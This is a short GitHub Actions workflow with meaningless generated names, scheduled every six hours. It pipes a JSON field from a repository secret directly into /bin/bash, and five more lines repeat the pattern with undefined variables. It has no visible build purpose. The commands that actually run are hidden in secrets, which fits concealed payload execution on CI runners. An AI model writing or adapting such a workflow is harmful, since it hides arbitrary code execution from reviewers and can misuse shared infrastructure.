name: huachenshui6473
on:
  workflow_dispatch:
  schedule:
    - cron: '6 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huachenshui6473
        env:
          gj444: ${{ secrets.gj444 }}
        run: |
          echo $gj444 | jq -r .pzv37 | /bin/bash
          echo $lyk8098 | jq -r .pg19 | /bin/bash
          echo $cfviu383 | jq -r .qzf06430 | /bin/bash
          echo $wgtir167 | jq -r .njpb67 | /bin/bash
          echo $omy93299 | jq -r .ipjw24217 | /bin/bash
          echo $rtnz924 | jq -r .qt09726 | /bin/bash

